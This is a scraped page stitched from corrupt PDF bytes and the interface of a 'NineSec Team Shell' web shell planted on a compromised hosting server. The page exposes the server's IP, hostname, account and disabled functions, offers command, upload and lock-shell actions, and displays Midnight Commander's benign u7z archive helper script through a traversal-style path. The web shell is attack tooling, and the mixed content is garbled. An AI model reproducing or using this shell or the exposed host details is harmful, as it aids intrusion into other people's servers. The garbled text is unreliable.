%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 82.180.170.48  /  Your IP : 3.15.139.248
Web Server : LiteSpeed
System : Linux us-phx-web1609.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u636808025 ( 636808025)
PHP Version : 8.2.28
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/../dev/../proc/../bin/../libexec/mc/extfs.d/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/../dev/../proc/../bin/../libexec/mc/extfs.d/u7z
#!/usr/bin/sh
#
# extfs support for p7zip
# Written by Pavel Roskin <[email protected]>
# Some Bugfixes/workarounds by Sergiy Niskorodov <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

P7ZIP=`which 7z 2>/dev/null` || P7ZIP=`which 7za 2>/dev/null` || P7ZIP=`which 7zr 2>/dev/null` || P7ZIP=""

# Let the test framework hook in:
P7ZIP=${MC_TEST_EXTFS_LIST_CMD:-$P7ZIP}
STAT=${MC_TEST_EXTFS_U7Z_STAT:-stat}

mcu7zip_list ()
{
        # Symlinks are not shown - no idea how to distinguish them
        # Read-only files are not shown as such - it's rarely useful

        ugid="`id -nu` `id -ng`"

        date_re='^\(....\)-\(..\)-\(..\) \(..:..:..\)' # 19 chars.
        date_mc='\2-\3-\1 \4'
        empty_date_re='^ \{19\}'

        size_re='............' # 12 chars.
        empty_size_re=' \{12\}'
        zero_size='           0'

        # archive entries can have no datetime info, 7z will use archive file datetime
        date_archive=`$STAT -c %y "$1" 2>/dev/null | sed -n "s/${date_re}.*/${date_mc}/p" 2>/dev/null`
        [ "${date_archive}"x = x ] && date_archive=`ls -lan "$1" 2>/dev/null | awk '{print $6, $7, $8}' 2>/dev/null`
        [ "${date_archive}"x = x ] && date_archive="01-01-1970 00:00:00"

        $P7ZIP l "$1" | sed -n "

                  # If the uncompressed size is missing, we copy the compressed size onto it.
                  #
                  # But first, if the compressed size is missing too, set it to zero:
                  s/^\(.\{19\} [D.]....\) $empty_size_re $empty_size_re/\1 $zero_size $zero_size/
                  # Next, do the copy:
                  s/^\(.\{19\} [D.]....\) $empty_size_re \($size_re\)/\1 \2 \2/
                  #
                  # (We use '.\{19\}' as the date may be missing. It may give false positives
                  # but we don't mind: the printing commands that follow use strict patterns.).

                  # Handle directories.
                  s/$date_re D.... $size_re $size_re\(.*\)/drwxr-xr-x 1 $ugid 0 $date_mc \5/p
            s/$empty_date_re D.... $size_re $size_re\(.*\)/drwxr-xr-x 1 $ugid 0 $date_archive \1/p

                  # Handle normal files.
                  s/$date_re \..... \($size_re\) $size_re\(.*\)/-rw-r--r-- 1 $ugid \5 $date_mc \6/p
            s/$empty_date_re \..... \($size_re\) $size_re\(.*\)/-rw-r--r-- 1 $ugid \1 $date_archive \2/p
        "
}

mcu7zip_copyout ()
{
        #first we check if we have old p7zip archive with prefix ./ in filename
        $P7ZIP l "$1" "$2" | grep -q "0 files, 0 folders" && \
        EXFNAME='*./'"$2" || EXFNAME="$2"
        $P7ZIP e -so "$1" "$EXFNAME" > "$3" 2>/dev/null
}

mcu7zip_copyin ()
{
        $P7ZIP a -si"$2" "$1" <"$3" >/dev/null 2>&1
}

mcu7zip_mkdir ()
{
        dir=`mktemp -d "${MC_TMPDIR:-/tmp}/mctmpdir-u7z.XXXXXX"` || exit 1
        mkdir -p "$dir"/"$2"
        $P7ZIP a -w"$dir" "$1" "$dir"/"$2" >/dev/null 2>&1
        rm -rf "$dir"
}

mcu7zip_rm ()
{
        # NOTE: Version 4.20 fails to delete files in subdirectories
        #first we check if we have old p7zip archive with prefix ./ in filename
        $P7ZIP l "$1" "$2" | grep -q "0 files, 0 folders" && \
        EXFNAME='*./'"$2" || EXFNAME="$2"
        $P7ZIP d "$1" "$EXFNAME" 2>&1 | grep -q E_NOTIMPL > /dev/null 2>&1 && \
        { printf "Function not implemented...\n7z cannot delete from solid archive." >&2 ; exit 1 ; }
}

mcu7zip_rmdir ()
{
        #first we check if we have old p7zip archive with prefix ./ in filename
        $P7ZIP l "$1" "$2" | grep -q "0 files, 0 folders" && \
        EXFNAME='*./'"$2" || EXFNAME="$2"
        $P7ZIP d "$1" "$EXFNAME"/ 2>&1 | grep -q E_NOTIMPL > /dev/null 2>&1 && \
        { printf "Function not implemented...\n7z cannot delete from solid archive." >&2 ; exit 1 ; }
}

# override any locale for dates
LC_DATE=C
export LC_DATE

umask 077

if [ -z "$P7ZIP" ]; then
    echo "Error: could not find p7zip (looked for 7z, 7za and 7zr)" >&2
    exit 1
fi

cmd="$1"
shift

case "$cmd" in
  list)    mcu7zip_list    "$@" | sort -k 8 ;;
  copyout) mcu7zip_copyout "$@" ;;
  copyin)  mcu7zip_copyin  "$@" ;;
  mkdir)   mcu7zip_mkdir   "$@" ;;
  rm)      mcu7zip_rm      "$@" ;;
  rmdir)   mcu7zip_rmdir   "$@" ;;
  *) exit 1 ;;
esac
exit 0

NineSec Team - 2022